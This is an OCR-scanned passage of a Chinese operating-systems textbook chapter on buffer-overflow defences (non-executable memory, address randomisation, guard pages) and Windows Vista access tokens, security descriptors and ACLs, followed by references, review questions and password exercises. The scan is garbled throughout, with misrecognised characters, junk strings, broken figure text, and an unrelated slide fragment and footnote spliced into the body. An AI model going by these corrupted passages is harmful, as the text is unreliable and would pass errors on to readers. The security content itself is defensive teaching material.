列 , 在 这 之 前 都 还 没有 这 种 支持 , 在 近期 则 在 它 的 MMU 中 添加 了 一 个 不 可 执行 位 。 为 了 支持 使 
用 这 一 特性 ，Linux、BSD 和 其 他 一 些 类 UNIX 系统 也 都 实现 了 这 种 扩展 。 堆 也 是 攻击 的 对 象 ， 
而 这 一 特性 也 确实 能 够 像 保 护 栈 那样 保护 堆 。 如 今 的 Windows 系统 包括 了 对 实现 不 可 执行 保护 
的 支持 。 

让 堆 ( 或 栈 ) 不 可 执行 的 方法 为 已 有 程序 提供 了 很 强 的 抵御 很 多 种 类 型 缓冲 区 溢出 攻击 的 能 
H, Ak, 一 些 现 有 操作 系统 的 发 布 版 本 都 将 包含 这 一 实现 作为 一 种 标准 。 但 是 , 存在 的 一 个 问 
题 就 是 仍 要 支持 那些 确实 需要 在 栈 中 放置 可 执行 代码 的 程序 。 比 如 , 这 种 情况 可 能 会 发 生 在 应 用 
于 Java 运行 时 系统 的 即时 编译 器 中 。 栈 中 的 可 执行 代码 也 可 以 用 来 实现 C 语言 中 的 髓 套 程 序 ( 一 
种 GCC 扩展 ) ， 也 可 以 用 在 Linux 信号 处 理 器 中 。 想 要 支持 这 些 需 求 还 需要 一 些 特殊 措施 。 尽 
管 如 此 ， 这 种 方法 仍 被 认为 是 保护 现 有 程序 和 加 固 系统 以 避免 一 些 攻击 的 最 好 方法 。 


地 址 空间 布局 随机 化 

另 一 种 用 来 抵御 攻击 的 运行 时 技术 涉及 对 进程 地 址 空间 中 关键 数据 结构 所 在 地 址 的 操纵 HF 
别 地 , 为 了 实现 传统 的 栈 溢 出 攻击 , 攻击 者 需要 能 够 准确 预测 出 目标 缓冲 区 的 位 置 。 攻 击 者 利用 
这 个 预测 出 的 地 址 来 确定 一 个 合适 的 返回 地 址 , 用 来 在 攻击 中 将 控制 传人 壳 代 码 。 一 种 用 来 大 
大 提高 这 种 预测 的 难度 的 方法 就 是 为 每 个 进程 随即 地 改变 栈 所 在 的 地 址 。 现代 处 理 器 中 地 址 的 
可 用 范围 很 大 (32 位 ) ,而且 绝 大 多 数 的 程序 只 需要 其 中 一 个 很 小 的 片段 。 因 此 ， 将 栈 存 储 


日 ”命名 来 自 矿工 使 用 的 黄 钴 石 . 它 能 够 检测 矿山 中 的 有 毒气 体 从 而 提醒 矿工 及 时 搬 离 。 
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器 区 域 移动 1M 字 节 或 者 只 需 对 大 多 数 程序 有 最 小 的 影响 ， 就 能 使 预测 目标 缓冲 区 地 址 变 得 几 
乎 不 可 能 。 


Windows/Linux 安全 性 对 比 
windows MN 


一 个 内 核对 象 ， 称 为 一 个 令 牌 ， 用 来 定义 系统 的 安全 | A poe 
界限 。 当 一 个 用 户 登 录 时 ， 大 多 数 进程 都 共享 被 创建 的 ne Tp ee EEH 
小 i 


令 牌 


令 牌 包括 个 人 和 小 组 的 身份 验证 ( 本 地 的 和 远程 的 ) ， 
Pr aT LLG ~~ - : 
同时 也 验证 一 些 特殊 权限 用 户 可 以 通过 本 地 或 远程 来 进行 身份 验证 


通过 访问 控制 表 ( ACL) 保护 对 象 ( 指 Windows 中 通 ei te psn: 
用 内 核对 象 ) ， 控 制 表 授权 或 取决 对 特定 用 户 或 小 组 的 ` TA ? 


访问 。ACL 维护 在 安全 描述 符 中 ， 安 全 描述 符 则 保存 在 ROSSER ET ere 
最 通用 的 Windows 文件 系统 一 NTFS 的 磁盘 上 Dera geri ee ss 


府 国 家 安全 局 开发 的 


另外 一 种 攻击 目标 是 标准 库 函 数 的 所 在 处 。 在 试图 绕 过 不 可 执行 栈 那样 的 保护 时 , 一 些 缓冲 
区 溢出 的 变 体 就 会 利用 标准 库 中 的 已 有 代码 。 这 些 往 往 都 是 在 同一 个 地 址 被 同一 个 程序 加 载 进来 
的 。 为 了 阻止 这 种 形式 的 攻击 , 我 们 可 以 利用 一 种 安全 扩展 方式 , 这 种 方式 通过 一 个 程序 以 及 它 
们 的 虚拟 存储 器 地 址 的 位 置 来 将 加 载 标准 库 的 顺序 随机 化 。 这 使 得 任何 特定 函数 的 地 址 都 是 完全 
不 可 预测 的 ， 从 而 让 一 个 给 定 攻击 正确 预测 到 它 的 地 址 的 机 会 变 得 很 低 。 

OpenBSD 系统 在 为 它 的 一 套 可 靠 系统 提供 技术 支持 时 就 包含 了 这 些 扩展 的 各 种 版 本 。 


守卫 页 

最 后 一 种 运行 时 技术 可 以 将 守卫 页 放置 于 一 段 进程 地 址 空间 的 各 个 存储 器 临界 区 之 间 。 同 
样 ,这 一 方法 利用 的 原理 是 一 个 进程 所 拥有 的 可 用 虚拟 内 存 远 远大 于 它 真 正 需 要 的 。gap 被 放置 
在 地 址 范围 之 间 , 为 地 址 空间 中 的 每 个 组 件 所 有 。 在 MMU F, 将 这 些 gap 或 保护 页 标记 为 非法 
地 址 , 任何 试图 获取 它们 的 操作 都 会 导致 进程 的 终止 。 这 样 可 以 防止 缓冲 区 溢出 攻击 , 典型 的 对 
于 全 局 数据 ， 它 们 会 试图 重 写 进程 地 址 空间 的 邻近 区 域 。 

进一步 的 扩展 将 守卫 页 面 放置 在 栈 帧 之 间或 者 堆 的 不 同 分 配 空 间 之 间 。 这 能 为 栈 和 堆 免 受 溢 
出 攻击 提供 更 进一步 的 保护 ， 但 要 花费 一 些 执行 时 间 来 支持 必要 的 大 量 的 页 映射 。 


15.6 Windows Vista 安全 性 


对 于 我 们 之 前 讨论 过 的 访问 权限 而 言 , 一 个 比较 有 代表 性 的 例子 是 Windows 访问 控制 功能 ， 
该 功能 通过 对 面向 对 象 概念 的 发 掘 来 提供 一 个 强大 并 且 灵 活 的 访问 控制 能 力 。 

Windows 提供 了 一 个 统一 的 访问 控制 功能 ， 该 功能 可 应 用 于 进程 、 线 程 、 文 件 、 信 和 号 量 、 窗 
口 以 及 其 他 对 象 。 访 问 控制 由 另外 两 个 实体 控制 : 一 个 是 针对 每 个 进程 中 的 访问 标志 ; 另 一 个 则 
是 针对 每 个 对 象 存在 的 安全 描述 符 ， 这 些 描述 符 决定 了 跨 进程 访问 的 可 行 与 否 。 


15.6.1 访问 控制 方案 


当 一 个 用 户 在 Windows 操作 系统 上 登录 时 ， 操 作 系统 会 任 借 用 户 名 /密码 机 制 来 对 用 户 进 行 
授权 。 如 果 登 录 被 接受 了 , 一 个 针对 该 用 户 的 进程 和 关联 该 进程 的 访问 令 牌 就 会 被 创建 出 来 。 后 
面 将 会 介绍 访问 令 牌 的 细节 ， 它 内 含 一 个 安全 ID ( SID )， 也 就 是 在 系统 看 来 用 于 区 别 用 户 的 一 
个 安全 身份 标志 。 如 果 一 个 用 户 进程 创建 了 一 个 新 进程 , 则 该 新 进程 会 自然 而 然 地 具备 其 父 进程 
的 访问 令 牌 。 
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访问 令 牌 的 主要 目的 如 下 : 
1 ) 它 包含 所 有 必要 的 安全 信息 ， 这 些 信息 可 以 用 于 加 速 安 全 认证 。 当 一 个 用 户 进程 进行 访 
问 操作 时 ， 安 全 子 系统 会 确保 会 使 用 安全 表示 符 来 决定 用 户 是 否 具备 相应 权限 。 
2) 它 的 存在 使 得 进程 在 不 影响 其 他 进程 的 运行 的 前 担 下， 通过 有 限 的 几 种 方 试 改变 其 自身 
的 权限 ， 从 而 实现 用 户 的 操作 目标 。 
第 二 点 最 为 重要 的 意义 在 于 处 理 可 能 跟 用 户 关 联 的 权限 。 访 问 令 牌 标志 了 用 户 应 该 具备 哪 一 
种 权限 。 通常 情况 下 ,标志 符 标 志 的 各 个 权限 都 是 以 无 效 为 初始 值 的 。 因此， 如 果 一 个 用 户 进程 
要 进行 一 个 需要 某 种 权限 的 操作 , 该 进程 就 激活 某 个 合适 的 权限 并 尝试 进行 访问 操作 。 用户 进 程 
之 间 不 共享 同一 个 标志 符 , 原因 在 于 一 旦 共享 , 激活 了 一 个 用 户 进程 的 权限 就 等 于 激活 了 一 组 进 
程 的 权限 。 
安全 描述 符 跟 负责 实现 跨 进 程 访 问 的 各 个 对 象 相关 联 。 安 全 描述 符 的 主要 组 成 部 分 是 -- 个 访 
问 控制 列表 , 该 列表 包含 针对 该 对 象 、 每 个 用 户 以 及 每 个 组 的 访问 权限 信息 。 当 一 个 进程 试图 访 
问 一 个 对 象 时 ， 该 进程 的 SID 会 被 用 来 跟 列 表 中 的 信息 比 对 以 确认 该 进程 是 否 具备 访问 权限 。 
当 一 个 应 用 程序 打开 了 指向 某 个 安全 对 象 的 引用 时 。Windows 会 核实 该 对 象 的 安全 描述 符 
是 否 赋予 该 应 用 程序 用 户 足够 的 访问 权限 。 如 果 核 实 成 功 ，Windows 会 对 这 些 获得 的 权限 进行 
缓存 。 
Windows 安全 中 一 个 重要 方面 是 模式 的 概念 ， 该 概念 简化 了 在 服务 器 /客户 机 模式 下 对 安全 
机 制 的 使 用 。 如 果 客 户 机 和 服务 器 通过 RPC 连接 ， 届 时 服务 可 以 评估 当前 客户 的 身份 ， 进 而 针 
对 该 客户 的 权限 情况 向 系统 要 求 合 适 的 访问 权限 。 待 访问 结束 后 , 服务 恢复 到 自己 原本 具备 的 权 
限 水 平 。 
15.6.2 ”访问 令 牌 
图 15.11a 显示 了 访问 令 牌 的 一 般 结构 ， 这 包括 以 下 几 个 参数 : 
e 安全 ID: 用 于 在 网 络 中 的 多 个 机 器 之 间 唯 一 地 标志 一 个 用 户 。 该 ID 跟 用 户 的 登录 名 称 
有 着 相对 应 的 关系 。 
@ 组 SID: 当前 用 户 所 属于 的 组 的 列表 。 一 个 组 包含 用 户 ID 的 集合 , 用 于 对 访问 权限 进行 
管理 。 每 一 个 组 有 一 个 唯一 的 组 SID 。 对 一 个 对 象 的 访问 可 以 在 组 SID、 个 人 SID 或 两 
者 的 组 合 的 基础 之 上 被 定义 出 来 。SID 同时 也 用 来 标志 一 个 进程 的 完整 性 级 别 ( 低级 、 
中 级 、 高 级 或 系统 级 )。 
© 权限 : 一 个 可 被 用 户 调用 的 系统 服务 的 列表 ， 该 列表 中 的 服务 对 安全 问题 极为 敏感 。 一 
个 例子 是 创建 标志 符 ; 另 一 个 例子 是 设置 备份 权限 。 具 备 该 权限 的 用 户 可 以 使 用 备份 工 
具 对 通常 情况 下 他 们 无 权 阅读 的 文件 进行 备份 。 
@ 默认 所 有 者 如 果 一 个 进程 创建 了 另外 一 个 对 象 ， 默 认 所 有 者 则 用 于 定义 谁 是 这 个 新 对 
象 的 所 有 者 。 通 常情 况 下 ， 一 个 新 进程 的 所 有 者 即 进程 的 创建 者 。 但 是 ， 用 户 可 能 会 设 
置 任何 新 创建 出 来 的 进程 的 默认 所 有 者 为 一 个 组 SID, 创建 该 进程 的 用 户 就 属于 这 个 组 。 
@ 默认 ACL: 这 是 一 个 初始 列表 ， 用 来 列 出 针对 用 户 创建 出 来 的 某 些 对 象 的 保护 。 用 户 可 
能 会 随即 更 改 一 个 对 象 的 ACL， 该 对 象 为 该 用 户 所 有 ， 或 者 是 为 该 用 户 所 在 的 组 所 有 。 


15.6.3 ”安全 描述 符 
图 15.11b 显示 了 安全 描述 符 的 一 般 结构 ， 这 主要 包含 以 下 几 个 参数 : 
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o 标志 : 定义 了 安全 描述 符 的 类 型 与 内 容 。 这 些 标 志 声 明了 SACL 和 DACL 是 否 存 在 ， 通 
过 默认 的 机 制 设 置 在 对 象 上 以 及 描述 符 中 的 指针 是 相对 地 址 还 是 绝对 地 址 。 相 关 的 描述 
符 需 要 在 网 络 之 间 传 递 对 象 ， 例 如 RPC 所 传递 的 信息 。 

@ 所 有 者 : 对 象 的 所 有 者 可 以 在 安全 描述 符 上 进行 任何 操作 。 所 有 者 可 以 是 任何 用 户 或 者 
是 组 SID。 所 有 者 可 以 改变 DACL 的 内 容 。 

@ 系统 访问 控制 列表 (SACL): 定义 了 哪 种 对 对 象 的 操作 需要 产生 监听 信息 。 一 个 应 用 程 
序 需 要 相应 的 权限 才 可 以 读 些 对 象 的 SACL。 这 是 为 了 预防 未 经 授权 的 应 用 程序 读 取 
SACL (从 而 了 解 不 应 做 什么 以 避免 产生 监听 ) RESA SACL ( 从 而 产生 大 量 的 监听 以 
使 得 非法 操作 不 被 注意 )。SACL 还 规定 了 对 象 完 整 性 级 别 。 进 程 无 法 更 改 一 个 对 象 ， 除 
非 该 进程 完整 性 级 别 满足 或 者 是 超出 了 该 对 象 的 安全 等 级 。 

o 自主 访问 控制 列表 (DACL ): 针对 每 一 操作 定义 了 哪 类 用 户 和 组 可 以 访问 该 对 象 。 它 由 











一 组 访问 控制 项 组 成 。 
| ACL | 
| ACE 
| 访问 标志 位 | 
-一 一 | 
Fen i | ack | 
安全 ID (SID) | 访问 标志 位 | 
asp | EEEN 


系统 访问 

控制 列表 f 
自由 访问 f 
控制 列表 | 


默认 所 有 者 
| 默认 Acr 上 


a) 访问 令 牌 b) 安全 描述 符 c) 访问 控制 列表 
15.11 Windows 安全 结构 体 





当 进 程 创建 一 个 对 象 时 ， 进 程 会 为 该 对 象 分 配 一 个 所 有 者 ， 或 者 是 其 自身 的 SID 或 者 是 其 
访问 令 牌 中 的 组 SID。 创建 对 象 的 进程 无 法 把 不 在 其 访问 令 牌 中 的 SID 设置 为 对 象 的 所 有 者 。 在 
这 个 前 提 下 , 任何 进程 具备 权限 以 改变 对 象 所 有 者 都 会 遵从 该 限制 。 这 一 限制 是 为 了 防止 用 户 在 
进行 了 某 些 未 经 授权 的 操作 后 掩盖 踪迹 。 

现在 ， 让 我 们 进一步 聚焦 于 访问 控制 列表 的 细节 ， 原 因 在 于 这 是 Windows 访问 控制 的 核心 
( 见 图 15.11c )。 每 一 个 列表 都 包含 了 整体 性 的 头 部 ， 以 及 一 系列 访问 控制 人 口 。 每 个 人 口 都 规定 
了 一 个 用 户 或 者 是 组 SD 以 及 其 访问 标志 位 ， 该 标识 位 定义 了 应 该 赋予 该 SD 的 权限 。 当 一 个 
进程 试图 访问 一 个 对 象 时 , Windows 执行 体 中 的 对 象 管理 器 会 从 访问 令 牌 中 读 取 SID 以 及 组 SID， 
同时 还 有 完整 性 级 别 SID。 如 果 访 问 请 求 包含 对 对 象 的 修改 , 则 参照 存放 在 SACL 中 的 且 标 对 象 
的 完整 性 级 别 , 该 完整 性 级 别 会 被 检查 ， 如 果 通 过 ， 对象 管理 器 会 扫描 对 象 的 DACL。 一 旦 发 现 
匹配 (这 意味 着 通过 SID 匹配 检查 ， 如 果 ACE 被 找到 ) 则 进程 会 获得 由 ACE 访问 控制 位 所 定 
义 的 访问 权限 。 这 同时 包含 否决 性 访问 权限 ， 在 这 种 情况 下 访问 请 求 失败 。 

图 15.12 展示 了 访问 控制 位 的 内 容 ,16 位 的 空间 给 出 了 针对 某 种 具体 类 型 的 访问 权限 。 例 如 ， 
对 一 个 文件 对 象 而 言 ， 第 0 位 是 File_Read_Data 控制 位 ， 而 对 事件 对 象 而 言 则 是 Event_ 
Query Status 控制 位 。 
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标准 访问 类 型 具体 访问 类 型 


访问 系统 安全 位 
最 大 权限 位 


一 般 全 部 权限 
一 般 执行 权限 
一 般 写 权限 
一 般 读 权限 


图 15.12 访问 令 牌 


意义 非凡 的 16 位 标志 位 涵盖 了 各 种 类 型 的 对 象 。 以 下 5 种 对 应 于 标准 的 访问 控制 类 型 : 
@ 同步 : 赋予 某 个 对 象 相 关 事件 同步 执行 的 权限 ， 同 时 还 有 一 些 关联 于 对 象 的 事件 。 也 就 
是 说 ， 这 些 对 象 可 以 应 用 于 等 待 功能 。 
@ Write_owner: 人 允许 一 个 程序 修改 对 象 的 所 有 者 。 这 .一 点 极 有 意义 ， 原 因 在 于 对 象 的 所 
有 者 总 可 以 改变 针对 对 象 的 保护 (所 有 者 可 能 会 拒绝 DAC 的 写 人 操作 )。 

© Write_DAC: 人 允许 应 用 程序 修改 DACL 以 及 之 后 应 用 在 对 象 上 的 保护 。 

@ Read_control: 允许 应 用 程序 查询 所 有 者 以 及 对 象 安 全 描述 符 的 DACL。 

© Delete: 人 允许 应 用 程序 删除 对 象 。 

存在 于 高 阶 部 分 的 8 个 访问 位 同时 包含 着 四 个 通用 的 访问 类 型 ,这 些 位 提供 了 一 种 方便 的 途 
径 以 针对 多 种 不 同 的 对 象 类 型 来 设置 具体 的 访问 类 型 。 例如 , 假设 一 个 应 用 程序 期 望 创建 几 种 类 
型 的 对 象 同时 保证 用 户 可 以 具备 对 这 些 对 象 的 读 权 限 , 即便 是 针对 这 些 不 同 种 类 的 对 象 , 读 操作 
意味 着 不 同 的 行为 。 为 了 保护 这 些 对 象 ， 在 不 借助 通用 访问 位 的 前 提 下 ， 应 用 程序 将 不 得 不 为 每 
种 类 型 构建 不 同 的 ACE， 并 同时 在 创建 对 象 的 过 程 中 谨慎 地 传递 ACE。 与 之 相 比 ， 创 建 一 个 唯一 
的 ACE 并 以 之 作为 保存 读 权 限 说 明 的 载体 ， 无 疑 是 一 种 更 为 简捷 的 方式 。 在 这 种 方式 下 ， 将 该 
ACE 应 用 于 每 一 个 创建 出 来 的 对 象 , 并 同时 使 得 正确 的 事情 发 生 。 这 正 是 通用 访问 标志 位 的 初衷 ， 

多 Generic_all: 允许 所 有 的 访问 。 

@ Generic execute: 允许 执行 。 

@ Generic write: 允许 写 操作 。 

@ Generic_read: 仅 人 允许 读 操作 。 

通用 位 同时 也 会 影响 标准 访问 类 型 。 例如， 对 于 一 个 文件 对 象 ，Generic_Read 位 对 应 于 标准 
位 Read_Control Synchronize 以 及 对 象 定义 位 File_Read Data 、File Read Attributes 以 及 
File_Read_EA。 将 一 个 ACE 设置 在 一 个 文件 对 象 上 ， 意 味 着 对 其 赋予 了 Generic_read WR, A 
时 也 意味 着 五 个 访问 控制 位 被 会 被 设置 ， 从 访问 控制 位 的 角度 来 看 ， 它 们 似乎 是 被 分 别 设置 的 。 

访问 控制 位 中 其 余 两 位 有 着 特殊 的 意义 。Access_System_Security 位 人 允许 修改 针对 对 象 的 监 
听 和 警报 控制 。 但 是 ， 这 些 位 不 仅仅 要 在 ACE 中 为 SID 而 设置 ， 还 要 在 访问 控制 标志 符 中 针对 
相应 的 SID 加 以 激活 。 

最 后 是 Maximum_Allowed 位 , 该 位 并 不 是 一 个 访问 控制 位 , 而 是 一 个 用 来 修改 Windows 扫 
描 这 个 SID 的 DACL 的 算法 的 比特 位 。 通 常情 况 下 , Windows 会 扫描 DACL 直到 找到 一 个 ACE, 
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该 ACE 中 定义 了 一 个 进程 所 要 求 的 授权 (位 集合 ) 或 是 访问 拒绝 ( 没有 被 设置 的 位 集合 )， 或 
者 扫描 至 DACL 的 末尾 ， 其 后 的 扫描 是 非法 的 。Maximum_Allowed 位 允许 对 象 的 所 有 者 定 一 
个 访问 权限 集合 ,该 集合 给 巴特 定 用 户 以 最 高 级 别 的 权限 。 在 这 些 前 提 下 ,假设 一 个 应 用 程序 
不 了 解 在 一 个 对 话 过 程 中 所 有 可 能 被 提出 的 针对 对 象 的 操作 , 则 针对 访问 请 求 存 在 以 下 三 个 处 
理 途 径 : 
1) 尝试 对 所 有 的 访问 开放 对 象 。 这 样 做 的 优势 在 于 即便 是 应 用 程序 具备 当前 对 话 过 程 中 的 
所 有 的 访问 权限 ， 其 对 对 象 的 访问 还 是 可 能 被 拒绝 。 
2) 只 在 特定 访问 发 生 的 情况 下 开放 对 象 ， 同 时 打开 一 个 指向 对 象 的 句柄 ， 用 于 回应 期 望 访 
问 对 象 的 各 种 请 求 。 这 是 较 多 被 采用 的 途径 ， 原 因 在 于 它 不 会 拒绝 对 对 象 的 访问 ， 也 不 
会 允许 非 必 要 的 访问 。 但 是 ， 这 种 方法 会 导致 更 多 的 系统 负担 。 
3 ) 在 一 定 程 度 上 开放 对 象 ， 开 放 的 程度 跟 当前 SID 一 致 。 这 种 办 法 的 优势 在 于 用 户 不 会 被 
人 为 地 拒绝 访问 ， 而 应 用 程序 可 能 会 有 更 多 的 不 必要 权限 。 后 者 可 能 意味 着 程序 中 存在 
错误 。 
Windows 安全 的 一 个 重要 特征 在 于 应 用 程序 可 以 使 用 Windows 安全 构架 来 实现 用 户 自 定义 
对 象 。 例 如 ,一 个 数据 库 服 务 器 可 能 会 创建 自己 的 安全 描述 符 并 将 其 绑 定 到 数据 库 的 某 个 部 分 上 。 
在 通常 的 读 写 操作 限制 之 外 , 服务 器 可 以 保证 针对 数据 的 操作 是 安全 的 , 例如 通过 深 轴 浏览 一 组 
数据 或 者 是 进行 数据 合并 。 定义 特定 权限 的 实施 途径 以 及 进行 安全 检查 是 服务 器 的 责任 。 然 而 检 
查 往 往 发 生 在 标准 的 环境 中 ， 使 用 系统 范畴 内 的 用 户 / 组 账户 以 及 监听 日 志 。 可 扩展 性 安全 模型 
对 于 实施 者 或 是 外 部 文件 服务 器 而 言 应 被 证 明 具 备 更 为 强大 的 特性 。 
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[STAL08] 对 本 章 主题 有 更 为 详尽 的 论述 。 

[OGOR03] 是 针对 用 户 授权 探索 的 阅读 资料 。[BURR04] 则 是 一 本 有 价值 的 研究 型 阅读 资料 。 

[SAND94] 是 一 本 整体 论述 访问 控制 的 绝 佳 著作 。[SAND96] 是 一 部 针对 RBAC 综合 性 的 总 览 ,[SAUN01] 
比较 了 RBAC 以 及 DAC。[SCAR07] 论 述 了 怎样 检测 和 应 对 侵 人 。[KENT00] 和 [MCHU00] 则 是 两 篇 有 价值 
的 专题 研究 性 文章 。[NING04] 研 究 了 在 人 侵 检测 技术 方面 近期 的 发 展 。[CASS01]，[FORR97]，[KEPH97] 
以 及 [NACH97] 是 的 对 于 反 病 毒 技 术 和 恶意 软件 防御 方面 的 总 览 性 著作 。[LHEE03] 研 究 了 交替 性 缓冲 溢出 
领域 的 技术 ， 其 中 有 一 些 本 章 并 未 提 及 。 同 时 该 书 还 设计 了 一 些 防御 技术 。[LEVY96] 最 早 给 出 了 针对 于 组 
冲 溢出 攻击 的 论述 。[KUPE05] 则 是 一 部 极 佳 的 总 览 。 
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推荐 网 站 


@ Password usage and generation: NIST documents on this topic 

@ Biometrics Consortium: Government-sponsored site for the research, testing, and evaluation of 
biometric technology 

@ NIST RBAC site: Includes numerous documents, standards,and software on RBAC trusion detection 

tools for hosts, applications, and networks 

Snort: Web site for Snort, an open source network intrusion prevention and detection system 

AntiVirus Online: IBM’s site on virus information 


VirusList: Site maintained by commercial antivirus software provider; good collection of useful 


information 


15.8 关键 术语 、 复 习题 和 习题 
关键 术语 


访问 控制 数字 免疫 系统 恶意 软件 

防 病毒 强制 访问 控制 ( DAC ) WIZE 

审计 记录 散 列 密码 基于 角色 的 访问 控制 (了 RBAC ) 
认证 基于 主机 的 人 侵 检 测 系统 Rootkit ( rootkit ) 

代理 软件 入 侵 检 测 智能 卡 

缓冲 区 溢出 入 侵 检测 系统 (IDS) 蠕虫 病毒 


复习 题 


15.1 
15.2 
15.3 
15.4 
15.5 
15.6 
15.7 
15.8 
15.9 


一 般 认 证 用 户 身 份 有 哪 四 种 方法 ? 

解释 图 15.1 中 salt 的 作用 。 

解释 一 个 简单 的 存储 卡 和 智能 卡 的 区 别 。 

列举 和 简要 描述 生物 特征 识别 认证 技术 的 主要 物理 特征 。 
简要 描述 DAC 和 RBAC 的 区 别 。 

解释 异常 人 侵 检 测 和 签名 入侵 检测 的 区 别 。 
什么 是 数字 免疫 系统 ? 

行为 封锁 软件 是 如 何 工作 的 ? 

描述 一 些 蠕虫 的 对 策 。 
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15.10 ” 哪 种 类 型 的 编程 语言 容易 受到 缓冲 区 滋 出 攻击 ? 


15.11 


防御 缓冲 区 溢出 工具 的 两 大 类 方法 是 什么 ? 


15.12 ”列举 并 简要 描述 在 编译 新 的 软件 时 能 用 上 的 一 些 抵御 缓冲 区 溢出 的 方法 。 
15.13 ”列举 并 简要 描述 在 运行 已 有 的 、 有 缺陷 的 软件 时 ， 能 执行 的 防御 缓冲 区 溢出 的 方法 。 


习题 


15.1 


15.2 


15.3 


15.4 


15.5 


15.6 


15.7 


解释 如 下 几 个 词语 作为 密码 适合 或 者 不 适合 的 地 方 : 
a) YK 334 e) Aristotle 
b) mfmitm f) ty9stove 
c) Nataliel g) 12345678 
d) Washington h ) dribgib 
早期 强制 用 户 使 用 不 容易 被 猜测 的 密码 的 一 种 的 方法 是 使 用 计算 机 提供 的 密码 。 这 种 密码 有 8 个 字 
符 长 度 ， 并 从 包括 小 写字 母 和 数字 的 字符 集 选 择 。 它 们 由 一 个 随机 数 发 生 器 产生 ， 有 25 个 可 能 的 取 
值 。 采 用 枚 举 的 技术 ， 要 破解 从 36 个 字符 集中 选 出 的 8 个 字符 长 度 的 密码 需要 的 时 间 是 112 年 。 不 
幸 的 是 ， 这 并 不 是 系统 实际 安全 强度 的 真实 反映 。 请 解释 为 什么 。 
假设 密码 都 是 从 26 个 字母 选 出 4 个 字符 的 组 合 。 假 设 攻 击 者 攻击 密码 的 速率 为 1 次 / 秒 。 
a) 假设 直到 一 次 攻击 尝试 结束 后 系统 才 有 反馈 ， 则 攻击 密码 成 功 的 期 望 时 间 是 多 少 ? 
b) 假设 每 输入 一 个 错误 的 字符 时 系统 都 有 输入 错误 的 提示 ， 则 攻击 密码 成 功 的 期 望 时 间 是 多 少 ? 
假设 源 的 元 素 长 庆 为 上 , 被 某 个 函数 均匀 的 映射 到 长 度 为 p 的 目标 元 素 。 如 果 每 个 数 代表 r 个 值 中 的 
一 个 ， 则 源 元 素 的 个 数 为 * ， 目 标 元 素 个 数 为 ~” 。 某 个 源 元 素 Xi 被 映射 成 目标 元 素 y, 。 
a) 则 在 一 次 尝试 中 ， 攻 击 者 找到 正确 的 源 元 素 的 可 能 性 是 多 少 ? 
b) 攻击 者 为 不 同 的 源 元 素 x, (x x ) 产生 同一 个 目标 元 素 yp, 的 可 能 是 多 少 ? 
c) 在 一 次 尝试 中 ， 攻 击 者 产生 正确 的 目标 元 素 的 可 能 性 是 多 少 ? 
假设 密码 的 字符 都 从 95 个 可 打印 的 ASCH 字符 集中 选 出 , 密码 长 度 为 8 个 字符 。 假设 密码 攻击 者 能 
每 秒 做 720 万 次 加 密 运 算 ， 则 测试 一 个 UNIX 系统 上 所 有 的 密码 需要 花 多 长 的 时 间 。 
由 于 已 知 的 UNIX 密码 系统 的 安全 风险 ，SunOS-4.0 操作 系统 文档 推荐 将 密码 文件 删除 , 并 由 一 个 可 
读 的 文件 /etc/publickey 来 替代 。 文件 中 对 用 户 A 的 条 目 包 含 用 户 身 份 IDP, ,用 户 公 钥 PU。， 和 相对 
应 的 私 钥 PR, 。 私 钥 通 过 DES 加 密 , 加 密 密 钥 是 用 户 的 登录 密码 已 。 当 A 登 录 时 ,系统 解密 E(P,PR,) 
来 获取 PR, o 
a) 系统 然后 验证 忆 是 否 正确 。 如 何 实 现 ? 
b) 攻击 者 如 何 攻击 这 个 系统 ? 
有 的 网 络 使 用 带 一 次 性 密码 ( OTP ) 的 双重 鉴别 。 这 个 方案 是 这 样 工作 的 : 每 个 用 户 有 一 个 秘密 的 
PIN 号 码 ( 他 们 所 知道 的 ) 和 一 个 “智能 卡 ”( 他 们 所 拥有 的 )。 智 能 卡 在 一 个 小 型 的 LCD 屏幕 上 显 
AR OTP， 而 当 网 络 对 用 户 进 行 鉴别 的 时 候 ， 用 户 要 提供 他 们 的 用 户 ID, PIN 和 OTP, RARE REE 
按照 不 同 的 随机 数 流 来 生成 随机 数 ， 并 且 每 个 智能 卡 经 过 固定 数量 的 时 钟 滴 答 生 成 下 一 个 随机 数 。 
网 络 鉴别 系统 通过 用 户 ID 查 到 该 用 户 的 智能 卡 所 用 的 随机 数 种 子 ， 只 有 在 OTP 与 用 户 ID、PIN 及 
系统 时 钟 一 致 的 时 候 才 授权 用 户 访 问 。 
对 于 下 面 的 问题 ， 假 定 网 络 的 鉴别 方案 使 用 如 下 配置 : 
1) PIN 是 一 个 两 位 数 。 
2) 智能 卡 显示 的 随机 数 是 4 个 小 写字 母 。 设 备 每 2 分 钟 产 生 一 个 新 的 OTP。 
a ) 一 个 想 要 渗入 网 络 的 人 侵 者 已 经 确定 了 用 户 的 登录 名 ,那么 使 用 随机 猜 的 PIN 和 OTP, 他 有 
多 大 概率 可 以 幸运 地 登录 成 功 ? 假如 鉴别 的 接口 不 提供 具体 的 反馈 ( 即 简单 地 返回 你 成 功 了 
还 是 失败 了 )， 那 么 在 人 侵 者 的 这 次 尝试 的 2 分 钟 后 ， 概 率 会 发 生 什么 变化 ? 
b) 假定 一 个 不 怀 好 意 的 同事 知道 了 一 个 用 户 的 PIN, 但 是 不 能 访问 到 他 的 OTP RR, BAK 
个 同事 通过 一 次 猜测 而 成 功 地 假扮 这 个 用 户 的 身份 的 概率 是 多 少 ? 
c) 如 果 登 录 过 程 需要 200 SH, a) Mb) 中 的 人 侵 者 期 望 要 等 多 长 时 间 才 能 进行 访问 ? 
d) 把 a) 的 结果 和 上 一 个 问题 做 比较 ， 双 重 鉴别 更 好 还 是 更 差 ? 双重 鉴别 提供 什么 好 处 ? 又 会 
造成 哪些 风险 ? 


15.8 


15.9 


15.10 


15.11 


15.12 


15.13 
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shimmer 项 目 〈 http://shimmer.sourceforge.net ) 使 用 持续 变化 的 端口 来 掩藏 运行 于 私有 服务 器 上 的 服 
务 。 它 是 这 样 工作 的 : shimmer 需要 一 组 网 络 端口 ( 假定 所 有 65534 个 端口 中 10000 ~ 10999 范围 内 
的 被 选中 ), 一 个 服务 名 (“hidden_http”) 和 一 个 秘密 密码 (“letmein”)。 它 把 时 钟 时 间 、 服 务 名 和 密 
码 组 合成 一 个 密码 学 散 列 ， 用 这 个 散 列 确定 应 该 用 16 个 端口 中 的 哪个 端口 连接 到 隐藏 的 服务 。 其 他 
的 15 个 端口 被 监控 来 动态 地 将 可 能 的 入 侵 者 列 人 黑 名 单 。 

